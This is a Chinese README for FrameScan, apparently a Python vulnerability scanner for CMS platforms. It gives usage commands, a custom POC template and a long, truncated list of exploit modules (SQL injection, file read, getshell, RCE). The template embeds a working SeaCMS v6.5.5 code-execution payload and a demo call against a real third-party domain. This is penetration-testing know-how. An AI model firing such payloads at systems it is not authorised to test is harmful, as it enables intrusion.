工具简介

FrameScan是一款python3编写的简易的cms漏洞检测框架,支持多种检测方式,支持大多数CMS,可以自定义CMS类型及自行编写POC。旨在帮助有安全经验的安全工程师对已知的应用快速发现漏洞。

支持平台

  • Windows
  • Linux
  • MAC (请自测)

工具特点

  • 单URL批量检测
  • 单URL单漏洞检测
  • 单URL指定CMS检测
  • 多URL单漏洞检测
  • 单URL单漏洞检测
  • 单URL指定CMS检测
FrameScan 一款python3编写的简易的cms漏洞检测框架
FrameScan 一款python3编写的简易的cms漏洞检测框架

详细参数

    -u          Url                      URL地址
    -f          Load urls file           文件路径
    -m          Use poc module           使用单个POC
    -c          Specify CMS              指定CMS类型
    -s          Search poc keywords      查找关键词漏洞
    -lc         List CMS POC             列出指定CMS漏洞
    -l          List avalible pocs       列出所有POC
    -r          Reload POC               重新加载POC
    -txt        Save Result(txt)         输出扫描结果(txt)
    -html       Save Result(html)        输出扫描结果(html)
    -h          Get help                 帮助信息

使用方法

①下载项目:

下载地址①: GitHub

git clone https://github.com/qianxiao996/FrameScan

②安装依赖(不需要!)

脚本主要依赖于以下模块(无需安装)
import sys,os,re
from color import *
import sqlite3,requests

③运行脚本

>python3 FrameScan.py
     _____                         ____
    |  ___| __ __ _ _ __ ___   ___/ ___|  ___ __ _ _ __
    | |_ | '__/ _` | '_ ` _ \ / _ \___ \ / __/ _` | '_ \
    |  _|| | | (_| | | | | | |  __/___) | (_| (_| | | | |
    |_|  |_|  \__,_|_| |_| |_|\___|____/ \___\__,_|_| |_|

    Options:                          Code by qianxiao996
    -----------------------------------------------------
    -u          Url                      URL地址
    -f          Load urls file           文件路径
    -m          Use poc module           使用单个POC
    -c          Specify CMS              指定CMS类型
    -s          Search poc keywords      查找关键词漏洞
    -lc         List CMS POC             列出指定CMS漏洞
    -l          List avalible pocs       列出所有POC
    -r          Reload POC               重新加载POC
    -txt        Save Result(txt)         输出扫描结果(txt)
    -html       Save Result(html)        输出扫描结果(html)
    -h          Get help                 帮助信息
    -----------------------------------------------------
    FrameScan  V1.1              Blog:blog.qianxiao996.cn

④单URL批量检测

python3 FrameScan.py -u URL

⑤单URL单漏洞检测(POC_METHOS可以用 -l、-s、-lc进行查询)

python3 FrameScan.py -u URL -m POC_METHOS

⑥单URL指定CMS检测

python3 FrameScan.py -u URL -m POC_METHOS

⑦多URL批量检测

python3 FrameScan.py -f 文件名

⑧多URL单漏洞检测

python3 FrameScan.py -f 文件名  -m  POC_METHOS

⑨多URL指定CMS检测

python3 FrameScan.py -f 文件名  -c  CMS类型

⑩输出到TXT或者HTML文件

python3 FrameScan.py -u URL -txt   文件名
python3 FrameScan.py -u URL -html  文件名

文件名 -c CMS类型

自定义POC模板

代码中采用自定义彩色输出,请尽量规范编写。脚本中为示例代码。

#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: 漏洞名称(禁止换行)控制在30字以内
referer: 漏洞地址(禁止换行)未知请填unknown
author: 作者名
description: 漏洞描述 
'''
import sys
import requests
import warnings
def run(url):
    #此处编辑检测代码
    #示例代码,请更改result内容,result[0]为漏洞名称,result[1]为返回的内容,result[2]为测试结果
    result = ['seacms v6.5.5代码执行漏洞','','']
    headers = {
        "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
    }
    payload = "searchtype=5&searchword={if{searchpage:year}&year=:as{searchpage:area}}&area=s{searchpage:letter}&letter=ert{searchpage:lang}&yuyan=($_SE{searchpage:jq}&jq=RVER{searchpage:ver}&&ver=[QUERY_STRING]));/*"
    url_path = url + "/search.php?phpinfo();"
    try:
        data = requests.get(url_path, timeout=3,headers=headers, verify=False)
        if data.status_code == 200 and 'phpinfo' in data.text:
            result[2]= "存在"
            result[1] = "URL:%s\nPOST:%s"%(url_path,payload)
        else:
            result[2] = "不存在"
    except Exception as e:
        # print (e)
        result[2] ="不存在"
        #这里可设置未知,连接超时等,只有不存在不会显示到结果中。
    return result
    #最后一定要返回一个带有3个参数的列表。不然会出错误。

if __name__ == "__main__":
    #此处不会调用
    warnings.filterwarnings("ignore")
    testVuln = run("http://baidu.com")
    print(testVuln)

工具poc列表

├─acsoft
│  │  GetFileContent_fileread.py
│  │  GetFile_fileread.py
│  │  GetXMLList_fileread.py
│  │
│  └─__pycache__acsoft_GetFileContent_fileread.cpython-37.pycacsoft_GetFile_fileread.cpython-37.pycacsoft_GetXMLList_fileread.cpython-37.pycGetFileContent_fileread.cpython-37.pycGetFile_fileread.cpython-37.pycGetXMLList_fileread.cpython-37.pyc
│
├─autoset
│  │  phpmyadmin_unauth.py
│  │
│  └─__pycache__autoset_phpmyadmin_unauth.cpython-37.pycphpmyadmin_unauth.cpython-37.pyc
│
├─bash
│  │  shellshock.py
│  │
│  └─__pycache__shellshock.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─cmseasy
│  │  header_detail_sqli.py
│  │
│  └─__pycache__cmseasy_header_detail_sqli.cpython-37.pycheader_detail_sqli.cpython-37.pyc
│
├─couchdb
│  │  unauth.py
│  │
│  └─__pycache__couchdb_unauth.cpython-37.pycunauth.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─dedecms
│  │  download_redirect.py
│  │  error_trace_disclosure.py
│  │  information.py
│  │  recommend_sqli.py
│  │  search_typeArr_sqli.py
│  │  version.py
│  │
│  └─__pycache__dedecms_download_redirect.cpython-37.pycdedecms_error_trace_disclosure.cpython-37.pycdedecms_recommend_sqli.cpython-37.pycdedecms_search_typeArr_sqli.cpython-37.pycdedecms_version.cpython-37.pycdownload_redirect.cpython-37.pycerror_trace_disclosure.cpython-37.pycinformation.cpython-37.pycrecommend_sqli.cpython-37.pycsearch_typeArr_sqli.cpython-37.pycversion.cpython-37.pyc
│
├─discuz
│  │  focus_flashxss.py
│  │  forum_message_ssrf.py
│  │  plugin_ques_sqli.py
│  │  x25_path_disclosure.py
│  │
│  └─__pycache__discuz_focus_flashxss.cpython-37.pycdiscuz_forum_message_ssrf.cpython-37.pycdiscuz_plugin_ques_sqli.cpython-37.pycdiscuz_x25_path_disclosure.cpython-37.pycfocus_flashxss.cpython-37.pycforum_message_ssrf.cpython-37.pycplugin_ques_sqli.cpython-37.pycx25_path_disclosure.cpython-37.pyc
│
├─diyou
│  │  latesindex_sqli.py
│  │  url_fileread.py
│  │
│  └─__pycache__dyp2p_latesindex_sqli.cpython-37.pycdyp2p_url_fileread.cpython-37.pyclatesindex_sqli.cpython-37.pycurl_fileread.cpython-37.pyc
│
├─dorado
│  │  default_passwd.py
│  │
│  └─__pycache__default_passwd.cpython-37.pycdorado_default_passwd.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─dreamgallery
│  │  album_id_sqli.py
│  │
│  └─__pycache__album_id_sqli.cpython-37.pycdreamgallery_album_id_sqli.cpython-37.pyc
│
├─dswjcms
│  │  p2p_multi_sqli.py
│  │
│  └─__pycache__dswjcms_p2p_multi_sqli.cpython-37.pycp2p_multi_sqli.cpython-37.pyc
│
├─ecscms
│  │  MoreIndex_sqli.py
│  │
│  └─__pycache__ecscms_MoreIndex_sqli.cpython-37.pycMoreIndex_sqli.cpython-37.pyc
│
├─ecshop
│  │  eshop_all_code_exec.py
│  │  orderid_sqli.py
│  │  uc_code_sqli.py
│  │
│  └─__pycache__ecshop_flow_orderid_sqli.cpython-37.pycecshop_uc_code_sqli.cpython-37.pyceshop_all_code_exec.cpython-37.pycorderid_sqli.cpython-37.pycuc_code_sqli.cpython-37.pyc
│
├─esccms
│  │  selectunitmember_unauth.py
│  │
│  └─__pycache__esccms_selectunitmember_unauth.cpython-37.pycselectunitmember_unauth.cpython-37.pyc
│
├─etmdcp
│  │  Load_filedownload.py
│  │
│  └─__pycache__etmdcp_Load_filedownload.cpython-37.pycLoad_filedownload.cpython-37.pyc
│
├─eyou
│  │  admin_id_sqli.py
│  │  resetpw.py
│  │  user_kw_sqli.py
│  │  weakpass.py
│  │
│  └─__pycache__admin_id_sqli.cpython-37.pyceyou_admin_id_sqli.cpython-37.pyceyou_resetpw.cpython-37.pyceyou_user_kw_sqli.cpython-37.pyceyou_weakpass.cpython-37.pycresetpw.cpython-37.pycuser_kw_sqli.cpython-37.pycweakpass.cpython-37.pyc
│
├─fastmeeting
│  │  download_filedownload.py
│  │
│  └─__pycache__download_filedownload.cpython-37.pycfastmeeting_download_filedownload.cpython-37.pyc
│
├─finecms
│  │  uploadfile.py
│  │  v508_getshell.py
│  │  v508_write_file.py
│  │
│  └─__pycache__finecms_508_getshell.cpython-37.pycfinecms_508_write_file.cpython-37.pycfinecms_uploadfile.cpython-37.pycuploadfile.cpython-37.pycv508_getshell.cpython-37.pycv508_write_file.cpython-37.pyc
│
├─foosun
│  │  City_ajax_sqli.py
│  │
│  └─__pycache__City_ajax_sqli.cpython-37.pycfoosun_City_ajax_sqli.cpython-37.pyc
│
├─fsmcms
│  │  columninfo_sqli.py
│  │  p_replydetail_sqli.py
│  │  setup_reinstall.py
│  │
│  └─__pycache__columninfo_sqli.cpython-37.pycfsmcms_columninfo_sqli.cpython-37.pycfsmcms_p_replydetail_sqli.cpython-37.pycfsmcms_setup_reinstall.cpython-37.pycp_replydetail_sqli.cpython-37.pycsetup_reinstall.cpython-37.pyc
│
├─glassfish
│  │  fileread.py
│  │
│  └─__pycache__fileread.cpython-37.pycglassfish_fileread.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─goahead
│  │  LD_PRELOAD_rce.py
│  │
│  ├─bin
│  │      goahead_payload.so
│  │
│  └─__pycache__goahead_LD_PRELOAD_rce.cpython-37.pycLD_PRELOAD_rce.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─gobetters
│  │  multi_sqli.py
│  │
│  └─__pycache__gobetters_multi_sqli.cpython-37.pycmulti_sqli.cpython-37.pyc
│
├─gowinsoft_jw
│  │  jw_multi_sqli.py
│  │
│  └─__pycache__gowinsoft_jw_multi_sqli.cpython-37.pycjw_multi_sqli.cpython-37.pyc
│
├─gpower
│  │  users_disclosure.py
│  │
│  └─__pycache__gpower_users_disclosure.cpython-37.pycusers_disclosure.cpython-37.pyc
│
├─hanweb
│  │  downfile_filedownload.py
│  │  readxml_fileread.py
│  │  VerifyCodeServlet_install.py
│  │
│  └─__pycache__downfile_filedownload.cpython-37.pychanweb_downfile_filedownload.cpython-37.pychanweb_readxml_fileread.cpython-37.pychanweb_VerifyCodeServlet_install.cpython-37.pycreadxml_fileread.cpython-37.pycVerifyCodeServlet_install.cpython-37.pyc
│
├─hfs
│  │  rejetto_search_rce.py
│  │
│  └─__pycache__hfs_rejetto_search_rce.cpython-37.pycrejetto_search_rce.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─Hishop
│  │  productlist_sqli.py
│  │
│  └─__pycache__hishop_productlist_sqli.cpython-37.pycproductlist_sqli.cpython-37.pyc
│
├─HTTP_SYS
│  │  HTTP_SYS_EXEC.py
│  │
│  └─__pycache__HTTP_SYS_EXEC.cpython-37.pyc
│
├─hudson
│  │  ws_disclosure.py
│  │
│  └─__pycache__hudson_ws_disclosure.cpython-37.pycws_disclosure.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─iGenus
│  │  code_exec.py
│  │  login_Lang_fileread.py
│  │  syslogin_Lang_fileread.py
│  │
│  └─__pycache__code_exec.cpython-37.pycigenus_code_exec.cpython-37.pycigenus_login_Lang_fileread.cpython-37.pycigenus_syslogin_Lang_fileread.cpython-37.pyclogin_Lang_fileread.cpython-37.pycsyslogin_Lang_fileread.cpython-37.pyc
│
├─iis
│  │  ms15034_httpsys_rce.py
│  │  webdav_rce.py
│  │
│  └─__pycache__iis_ms15034_httpsys_rce.cpython-37.pyciis_webdav_rce.cpython-37.pycms15034_httpsys_rce.cpython-37.pycwebdav_rce.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─inspur
│  │  ecgap_displayNewsPic_sqli.py
│  │  multi_sqli.py
│  │
│  └─__pycache__ecgap_displayNewsPic_sqli.cpython-37.pycinspur_ecgap_displayNewsPic_sqli.cpython-37.pycinspur_multi_sqli.cpython-37.pycmulti_sqli.cpython-37.pyc
│
├─intel
│  │  amt_crypt_bypass.py
│  │
│  └─__pycache__amt_crypt_bypass.cpython-37.pycintel_amt_crypt_bypass.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─iwms
│  │  bypass_js_delete.py
│  │
│  └─__pycache__bypass_js_delete.cpython-37.pyciwms_bypass_js_delete.cpython-37.pyc
│
├─jeecg
│  │  pwd_reset.py
│  │
│  └─__pycache__jeecg_pwd_reset.cpython-37.pycpwd_reset.cpython-37.pyc
│
├─jeecms
│  │  fpath_filedownload.py
│  │
│  └─__pycache__fpath_filedownload.cpython-37.pycjeecms_fpath_filedownload.cpython-37.pyc
│
├─joomla
│  │  com_docman_lfi.py
│  │  index_list_sqli.py
│  │
│  └─__pycache__com_docman_lfi.cpython-37.pycindex_list_sqli.cpython-37.pycjoomla_com_docman_lfi.cpython-37.pycjoomla_index_list_sqli.cpython-37.pyc
│
├─jumboecms
│  │  slide_id_sqli.py
│  │
│  └─__pycache__jumboecms_slide_id_sqli.cpython-37.pycslide_id_sqli.cpython-37.pyc
│
├─kingdee
│  │  conf_disclosure.py
│  │  filedownload.py
│  │  logoImgServlet_fileread.py
│  │  resin_dir_path_disclosure.py
│  │
│  └─__pycache__conf_disclosure.cpython-37.pycfiledownload.cpython-37.pyckingdee_conf_disclosure.cpython-37.pyckingdee_filedownload.cpython-37.pyckingdee_logoImgServlet_fileread.cpython-37.pyckingdee_resin_dir_path_disclosure.cpython-37.pyclogoImgServlet_fileread.cpython-37.pycresin_dir_path_disclosure.cpython-37.pyc
│
├─kxmail
│  │  login_server_sqli.py
│  │
│  └─__pycache__kxmail_login_server_sqli.cpython-37.pyclogin_server_sqli.cpython-37.pyc
│
├─lbcms
│  │  webwsfw_bssh_sqli.py
│  │
│  └─__pycache__lbcms_webwsfw_bssh_sqli.cpython-37.pycwebwsfw_bssh_sqli.cpython-37.pyc
│
├─libsys
│  │  ajax_asyn_link_fileread.py
│  │  ajax_asyn_link_old_fileread.py
│  │  ajax_get_file_fileread.py
│  │
│  └─__pycache__ajax_asyn_link_fileread.cpython-37.pycajax_asyn_link_old_fileread.cpython-37.pycajax_get_file_fileread.cpython-37.pyclibsys_ajax_asyn_link_fileread.cpython-37.pyclibsys_ajax_asyn_link_old_fileread.cpython-37.pyclibsys_ajax_get_file_fileread.cpython-37.pyc
│
├─live800
│  │  downlog_filedownload.py
│  │  fileDownloadServer_fileread.py
│  │  loginAction_sqli.py
│  │  sta_export_sqli.py
│  │
│  └─__pycache__downlog_filedownload.cpython-37.pycfileDownloadServer_fileread.cpython-37.pyclive800_downlog_filedownload.cpython-37.pyclive800_fileDownloadServer_fileread.cpython-37.pyclive800_loginAction_sqli.cpython-37.pyclive800_services_xxe.cpython-37.pyclive800_sta_export_sqli.cpython-37.pycloginAction_sqli.cpython-37.pycservices_xxe.cpython-37.pycsta_export_sqli.cpython-37.pyc
│
├─looyu
│  │  down_filedownload.py
│  │
│  └─__pycache__down_filedownload.cpython-37.pyclooyu_down_filedownload.cpython-37.pyc
│
├─metinfo
│  │  getpassword_sqli.py
│  │  login_check_sqli.py
│  │
│  └─__pycache__getpassword_sqli.cpython-37.pyclogin_check_sqli.cpython-37.pycmetinfo_getpassword_sqli.cpython-37.pycmetinfo_login_check_sqli.cpython-37.pyc
│
├─ndstar
│  │  six_sqli.py
│  │
│  └─__pycache__ndstar_six_sqli.cpython-37.pycsix_sqli.cpython-37.pyc
│
├─nitc
│  │  index_language_id_sqli.py
│  │  suggestwordList_sqli.py
│  │
│  └─__pycache__index_language_id_sqli.cpython-37.pycnitc_index_language_id_sqli.cpython-37.pycnitc_suggestwordList_sqli.cpython-37.pycsuggestwordList_sqli.cpython-37.pyc
│
├─opensns
│  │  index_arearank.py
│  │  index_getshell.py
│  │
│  └─__pycache__index_arearank.cpython-37.pycindex_getshell.cpython-37.pycopensns_index_arearank.cpython-37.pycopensns_index_getshell.cpython-37.pyc
│
├─others
│  │  alkawebs_viewnews_sqli.py
│  │  anmai_grghjl_stuNo_sqli.py
│  │  anmai_teachingtechnology_sqli.py
│  │  caitong_multi_sleep_sqli.py
│  │  caitong_multi_sqli.py
│  │  clib_kindaction_fileread.py
│  │  clib_kinweblistaction_download.py
│  │  damall_selloffer_sqli.py
│  │  dkcms_database_disclosure.py
│  │  domino_unauth.py
│  │  efuture_downloadAct_filedownload.py
│  │  eis_menu_left_edit_sqli.py
│  │  euse_study_multi_sqli.py
│  │  forease_fileinclude_code_exec.py
│  │  gevercms_downLoadFile_filedownload.py
│  │  gn_consulting_sqli.py
│  │  gpcsoft_ewebeditor_weak.py
│  │  gxwssb_fileDownloadmodel_download.py
│  │  haohan_FileDown_filedownload.py
│  │  hezhong_list_id_sqli.py
│  │  hjsoft_sqli.py
│  │  hnkj_researchinfo_dan_sqli.py
│  │  hongan_dlp_struts_exec.py
│  │  huaficms_bypass_js.py
│  │  ips_community_suite_code_exec.py
│  │  jiuyu_library_struts_exec.py
│  │  jxt1039_unauth.py
│  │  kj65n_monitor_sqli.py
│  │  lianbang_multi_bypass_priv.py
│  │  mainone_b2b_Default_sqli.py
│  │  mainone_ProductList_sqli.py
│  │  mainone_SupplyList_sqli.py
│  │  mallbuilder_change_status_sqli.py
│  │  mingteng_cookie_deception.py
│  │  newedos_multi_sqli.py
│  │  nongyou_Item2_sqli.py
│  │  nongyou_multi_sqli.py
│  │  nongyou_ShowLand_sqli.py
│  │  nongyou_sleep_sqli.py
│  │  rap_interface_struts_exec.py
│  │  shiyou_list_keyWords_sqli.py
│  │  sinda_downloadfile_download.py
│  │  skytech_bypass_priv.py
│  │  skytech_geren_list_page_sqli.py
│  │  star_PostSuggestion_sqli.py
│  │  suntown_upfile_fileupload.py
│  │  tianbo_Class_Info_sqli.py
│  │  tianbo_St_Info_sqli.py
│  │  tianbo_TCH_list_sqli.py
│  │  tianbo_Type_List_sqli.py
│  │  tpshop_eval_stdin_code_exec.py
│  │  workyi_multi_sqli.py
│  │  xtcms_download_filedownload.py
│  │  xuezi_ceping_unauth.py
│  │  yaojie_steel_struts_exec.py
│  │  yeu_disclosure_uid.py
│  │  zfcgxt_UserSecurityController_getpass.py
│  │  zf_cms_FileDownload.py
│  │  zhuofan_downLoadFile_download.py
│  │
│  └─__pycache__alkawebs_viewnews_sqli.cpython-37.pycanmai_grghjl_stuNo_sqli.cpython-37.pycanmai_teachingtechnology_sqli.cpython-37.pyccaitong_multi_sleep_sqli.cpython-37.pyccaitong_multi_sqli.cpython-37.pyccicro_DownLoad_filedownload.cpython-37.pycclib_kindaction_fileread.cpython-37.pycclib_kinweblistaction_download.cpython-37.pycdamall_selloffer_sqli.cpython-37.pycdkcms_database_disclosure.cpython-37.pycdomino_unauth.cpython-37.pycefuture_downloadAct_filedownload.cpython-37.pyceis_menu_left_edit_sqli.cpython-37.pyceuse_study_multi_sqli.cpython-37.pycforease_fileinclude_code_exec.cpython-37.pycgevercms_downLoadFile_filedownload.cpython-37.pycgn_consulting_sqli.cpython-37.pycgpcsoft_ewebeditor_weak.cpython-37.pycgxwssb_fileDownloadmodel_download.cpython-37.pychaohan_FileDown_filedownload.cpython-37.pychezhong_list_id_sqli.cpython-37.pychjsoft_sqli.cpython-37.pychnkj_researchinfo_dan_sqli.cpython-37.pychongan_dlp_struts_exec.cpython-37.pychuaficms_bypass_js.cpython-37.pycips_community_suite_code_exec.cpython-37.pycjiuyu_library_struts_exec.cpython-37.pycjxt1039_unauth.cpython-37.pyckj65n_monitor_sqli.cpython-37.pyclianbang_multi_bypass_priv.cpython-37.pycmainone_b2b_Default_sqli.cpython-37.pycmainone_ProductList_sqli.cpython-37.pycmainone_SupplyList_sqli.cpython-37.pycmallbuilder_change_status_sqli.cpython-37.pycmingteng_cookie_deception.cpython-37.pycnewedos_multi_sqli.cpython-37.pycnongyou_Item2_sqli.cpython-37.pycnongyou_multi_sqli.cpython-37.pycnongyou_ShowLand_sqli.cpython-37.pycnongyou_sleep_sqli.cpython-37.pycrap_interface_struts_exec.cpython-37.pycshiyou_list_keyWords_sqli.cpython-37.pycsinda_downloadfile_download.cpython-37.pycskytech_bypass_priv.cpython-37.pycskytech_geren_list_page_sqli.cpython-37.pycstar_PostSuggestion_sqli.cpython-37.pycsuntown_upfile_fileupload.cpython-37.pyctianbo_Class_Info_sqli.cpython-37.pyctianbo_St_Info_sqli.cpython-37.pyctianbo_TCH_list_sqli.cpython-37.pyctianbo_Type_List_sqli.cpython-37.pyctpshop_eval_stdin_code_exec.cpython-37.pycworkyi_multi_sqli.cpython-37.pycxtcms_download_filedownload.cpython-37.pycxuezi_ceping_unauth.cpython-37.pycyaojie_steel_struts_exec.cpython-37.pycyeu_disclosure_uid.cpython-37.pyczfcgxt_UserSecurityController_getpass.cpython-37.pyczf_cms_FileDownload.cpython-37.pyczhuofan_downLoadFile_download.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─pageadmin
│  │  forge_viewstate.py
│  │
│  └─__pycache__forge_viewstate.cpython-37.pycpageadmin_forge_viewstate.cpython-37.pyc
│
├─php
│  │  expose_disclosure.py
│  │  fastcgi_read.py
│  │
│  └─__pycache__expose_disclosure.cpython-37.pycfastcgi_read.cpython-37.pycphp_expose_disclosure.cpython-37.pycphp_fastcgi_read.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─php168
│  │  login_getshell.py
│  │
│  └─__pycache__login_getshell.cpython-37.pycphp168_login_getshell.cpython-37.pyc
│
├─phpcms
│  │  authkey_disclosure.py
│  │  digg_add_sqli.py
│  │  flash_upload_sqli.py
│  │  product_code_exec.py
│  │  v961_fileread.py
│  │  v96_sqli.py
│  │  v9_flash_xss.py
│  │
│  └─__pycache__authkey_disclosure.cpython-37.pycdigg_add_sqli.cpython-37.pycflash_upload_sqli.cpython-37.pycphpcms_authkey_disclosure.cpython-37.pycphpcms_digg_add_sqli.cpython-37.pycphpcms_flash_upload_sqli.cpython-37.pycphpcms_product_code_exec.cpython-37.pycphpcms_v961_fileread.cpython-37.pycphpcms_v96_sqli.cpython-37.pycphpcms_v9_flash_xss.cpython-37.pycproduct_code_exec.cpython-37.pycv961_fileread.cpython-37.pycv96_sqli.cpython-37.pycv9_flash_xss.cpython-37.pyc
│
├─phpmyadmin
│  │  setup_lfi.py
│  │
│  └─__pycache__phpmyadmin_setup_lfi.cpython-37.pycsetup_lfi.cpython-37.pyc
│
├─phpok
│  │  api_param_sqli.py
│  │  remote_image_getshell.py
│  │  res_action_control_filedownload.py
│  │
│  └─__pycache__api_param_sqli.cpython-37.pycphpok_api_param_sqli.cpython-37.pycphpok_remote_image_getshell.cpython-37.pycphpok_res_action_control_filedownload.cpython-37.pycremote_image_getshell.cpython-37.pycres_action_control_filedownload.cpython-37.pyc
│
├─phpstudy
│  │  phpmyadmin_defaultpwd.py
│  │  phpstudy_backdoor.py
│  │  probe.py
│  │
│  └─__pycache__phpmyadmin_defaultpwd.cpython-37.pycphpstudy_backdoor.cpython-37.pycphpstudy_phpmyadmin_defaultpwd.cpython-37.pycphpstudy_probe.cpython-37.pycprobe.cpython-37.pyc
│
├─piaoyou
│  │  int_order_sqli.py
│  │  multi_sqli.py
│  │  newsview_list.py
│  │  six2_sqli.py
│  │  six_sqli.py
│  │  ten_sqli.py
│  │
│  └─__pycache__int_order_sqli.cpython-37.pycmulti_sqli.cpython-37.pycnewsview_list.cpython-37.pycpiaoyou_int_order_sqli.cpython-37.pycpiaoyou_multi_sqli.cpython-37.pycpiaoyou_newsview_list.cpython-37.pycpiaoyou_six2_sqli.cpython-37.pycpiaoyou_six_sqli.cpython-37.pycpiaoyou_ten_sqli.cpython-37.pycsix2_sqli.cpython-37.pycsix_sqli.cpython-37.pycten_sqli.cpython-37.pyc
│
├─PKPMBS
│  │  addresslist_keyword_sqli.py
│  │  guestbook_sqli.py
│  │  MsgList_sqli.py
│  │
│  └─__pycache__addresslist_keyword_sqli.cpython-37.pycguestbook_sqli.cpython-37.pycMsgList_sqli.cpython-37.pycpkpmbs_addresslist_keyword_sqli.cpython-37.pycpkpmbs_guestbook_sqli.cpython-37.pycpkpmbs_MsgList_sqli.cpython-37.pyc
│
├─pstar
│  │  isfLclInfo_sqli.py
│  │  qcustoms_sqli.py
│  │  warehouse_msg_01_sqli.py
│  │
│  └─__pycache__isfLclInfo_sqli.cpython-37.pycpstar_isfLclInfo_sqli.cpython-37.pycpstar_qcustoms_sqli.cpython-37.pycpstar_warehouse_msg_01_sqli.cpython-37.pycqcustoms_sqli.cpython-37.pycwarehouse_msg_01_sqli.cpython-37.pyc
│
├─qibocms
│  │  js_f_id_sqli.py
│  │  search_code_exec.py
│  │  search_sqli.py
│  │  s_fids_sqli.py
│  │
│  └─__pycache__js_f_id_sqli.cpython-37.pycqibocms_js_f_id_sqli.cpython-37.pycqibocms_search_code_exec.cpython-37.pycqibocms_search_sqli.cpython-37.pycqibocms_s_fids_sqli.cpython-37.pycsearch_code_exec.cpython-37.pycsearch_sqli.cpython-37.pycs_fids_sqli.cpython-37.pyc
│
├─resin
│  │  viewfile_fileread.py
│  │
│  └─__pycache__resin_viewfile_fileread.cpython-37.pycviewfile_fileread.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─ruvar
│  │  multi_sqli.py
│  │  multi_sqli2.py
│  │  multi_sqli3.py
│  │
│  └─__pycache__multi_sqli.cpython-37.pycmulti_sqli2.cpython-37.pycmulti_sqli3.cpython-37.pycruvar_oa_multi_sqli.cpython-37.pycruvar_oa_multi_sqli2.cpython-37.pycruvar_oa_multi_sqli3.cpython-37.pyc
│
├─sangfor
│  │  ad_script_command_exec.py
│  │
│  └─__pycache__ad_script_command_exec.cpython-37.pycsangfor_ad_script_command_exec.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─seacms
│  │  order_code_exec.py
│  │  search_code_exec.py
│  │  search_jq_code_exec.py
│  │  v655_code_exec.py
│  │
│  └─__pycache__order_code_exec.cpython-37.pycseacms_655_code_exec.cpython-37.pycseacms_backstage_getshell.cpython-37.pycseacms_order_code_exec.cpython-37.pycseacms_search_code_exec.cpython-37.pycseacms_search_jq_code_exec.cpython-37.pycsearch_code_exec.cpython-37.pycsearch_jq_code_exec.cpython-37.pycv655_code_exec.cpython-37.pyc
│
├─shadowsit
│  │  selector_lfi.py
│  │
│  └─__pycache__selector_lfi.cpython-37.pycshadowsit_selector_lfi.cpython-37.pyc
│
├─shop360
│  │  do_filedownload.py
│  │
│  └─__pycache__do_filedownload.cpython-37.pycshop360_do_filedownload.cpython-37.pyc
│
├─shop7z
│  │  order_checknoprint_sqli.py
│  │
│  └─__pycache__order_checknoprint_sqli.cpython-37.pycshop7z_order_checknoprint_sqli.cpython-37.pyc
│
├─shopex
│  │  phpinfo_disclosure.py
│  │
│  └─__pycache__phpinfo_disclosure.cpython-37.pycshopex_phpinfo_disclosure.cpython-37.pyc
│
├─shopnc
│  │  index_class_id_sqli.py
│  │
│  └─__pycache__index_class_id_sqli.cpython-37.pycshopnc_index_class_id_sqli.cpython-37.pyc
│
├─shopnum
│  │  GuidBuyList_sqli.py
│  │  ProductDetail_sqli.py
│  │  ProductListCategory_sqli.py
│  │  ShoppingCart1_sqli.py
│  │
│  └─__pycache__GuidBuyList_sqli.cpython-37.pycProductDetail_sqli.cpython-37.pycProductListCategory_sqli.cpython-37.pycshopnum_GuidBuyList_sqli.cpython-37.pycshopnum_ProductDetail_sqli.cpython-37.pycshopnum_ProductListCategory_sqli.cpython-37.pycshopnum_ShoppingCart1_sqli.cpython-37.pycShoppingCart1_sqli.cpython-37.pyc
│
├─siteengine
│  │  comments_module_sqli.py
│  │
│  └─__pycache__comments_module_sqli.cpython-37.pycsiteengine_comments_module_sqli.cpython-37.pyc
│
├─siteserver
│  │  background_administrator_sqli.py
│  │  background_keywordsFilting_sqli.py
│  │  background_log_sqli.py
│  │  background_taskLog_sqli.py
│  │  UserNameCollection_sqli.py
│  │
│  └─__pycache__background_administrator_sqli.cpython-37.pycbackground_keywordsFilting_sqli.cpython-37.pycbackground_log_sqli.cpython-37.pycbackground_taskLog_sqli.cpython-37.pycsiteserver_background_administrator_sqli.cpython-37.pycsiteserver_background_keywordsFilting_sqli.cpython-37.pycsiteserver_background_log_sqli.cpython-37.pycsiteserver_background_taskLog_sqli.cpython-37.pycsiteserver_UserNameCollection_sqli.cpython-37.pycUserNameCollection_sqli.cpython-37.pyc
│
├─smartoa
│  │  multi_filedownload.py
│  │
│  └─__pycache__multi_filedownload.cpython-37.pycsmartoa_multi_filedownload.cpython-37.pyc
│
├─smtp
│  │  starttls_plaintext_inj.py
│  │
│  └─__pycache__smtp_starttls_plaintext_inj.cpython-37.pycstarttls_plaintext_inj.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─speedcms
│  │  list_cid_sqli.py
│  │
│  └─__pycache__list_cid_sqli.cpython-37.pycspeedcms_list_cid_sqli.cpython-37.pyc
│
├─srun
│  │  download_file_filedownload.py
│  │  index_file_filedownload.py
│  │  rad_online_bypass_rce.py
│  │  rad_online_username_rce.py
│  │  user_info_uid_rce.py
│  │
│  └─__pycache__download_file_filedownload.cpython-37.pycindex_file_filedownload.cpython-37.pycrad_online_bypass_rce.cpython-37.pycrad_online_username_rce.cpython-37.pycsrun_download_file_filedownload.cpython-37.pycsrun_index_file_filedownload.cpython-37.pycsrun_rad_online_bypass_rce.cpython-37.pycsrun_rad_online_username_rce.cpython-37.pycsrun_user_info_uid_rce.cpython-37.pycuser_info_uid_rce.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─tcexam
│  │  reinstall_getshell.py
│  │
